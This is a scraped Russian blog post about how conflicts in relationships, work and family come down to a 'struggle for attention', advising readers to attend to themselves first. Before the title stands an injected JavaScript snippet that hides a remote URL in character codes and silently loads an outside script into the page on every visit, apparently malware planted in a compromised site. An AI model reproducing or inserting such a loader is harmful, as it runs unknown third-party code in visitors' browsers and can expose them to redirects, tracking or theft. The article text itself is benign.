var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);} Борьба за внимание | Ivan Zalesskiy

Если вдуматься в проблему конфликтов взаимоотношений, то можно легко проследить одну общую черту - борьбу за внимание.
Девушки красиво одеваются и идут в клуб только за одним - получить внимание мужчин. Чего добивается тот, кто в компании громче всех смеётся и всех перебивает – правильно, внимания окружающих. Мы стремимся почаще выкладывать фотки в instagram – зачем? Муж пилит свою жену за недостаточное внимание к его персоне, а ей некогда она в Instagram. Жена недовольна тем, что муж много работает и мало уделяет внимания ей - вот вам причина для ссоры. На работе начальник требует от подчиненных больше внимания к рабочему процессу (ну и к его мнению тоже), а работнику не хватает времени, вот вам конфликт на работе. Политики сражаются за внимание общественности. Ребёнок истерит и не слушается родителя, требуя внимание к себе. (С детской борьбой за внимание это отдельная тема, так как данный феномен настолько разрастается и прогрессирует, что у врачей уже появился диагноз, который ставят детям «Синдром дефицита внимания»). Вся наша жизнь сплошная "Борьба" за Внимание, где мы либо отстаиваем свои интересы, либо добиваемся внимания окружающих. Что с этим делать?

Внимание, может проявляется по-разному:
- Голосом  (комплименты, похвала, поощрения).
- Слухом (умение слушать целая наука).
- Тактильно, через тело (обнимашки, поглаживания, секс).
- Действиями (цветы, подарки, мероприятия).
Но все это будет полезно только в моменты необходимости, а их стоит начать чувствовать …


Теперь самое главное - что делать, если Вы испытываете дефицит внимания?

В первую очередь перестать ждать внимания от окружающих Вас людей, а начать уделять внимание себе. Понимать в чем нуждаетесь, и давать это себе - поощрять, подбадривать, дарить подарки, ходить на массажи или другие приятные процедуры, не отказываться от секса, устраивать себе развлечения и сюрпризы, осуществлять свои мечты и радоваться как ребёнок всему этому. Второе – от избытка личного внимания, начать уделять внимание близким, мужу (жене), ребенку, маме? друзьям и т.д. Но, еще раз! Сначала себе, а потом остальным.

Для тех, кто хочет поспорить, предлагаю посчитать время, которое вы уделяете себе, и все станет на свои места.

Пример: В сутках 24 часа - сон 8ч. = 16ч. Работа -8ч. Дорога до работы -1ч. Телевизор -2ч. Соцсети -1ч. Родственники (друзья) -2ч. Приготовление еды, уборка дома, магазины и т.д. -2ч. И все это время мы тратим на них.

А сколько осталось на себя, на свои удовольствия?

Поделится в соц сетях:
Система Orphus

Добавить комментарий

Подобные материалы

Главным и первичным различием у Мужчин и Женщин является разная энергетическая структура. Именно это формируют их...

Этот эксперимент я проводил с целью получения опыта восприятия реальности без помощи зрения, используя остальные...

Откуда взялось чувство, что вещь моя? Причем тут чувство собственности? У нас у всех есть такая «программка», мы...

ПОДПИШИТЕСЬ НА НАШУ РАССЫЛКУ

ХОТИТЕ ПОЛУЧАТЬ НОВОСТИ ИЛИ ИНФОРМАЦИЮ О БЛИЖАЙЩИХ СЕМИНАРАХ?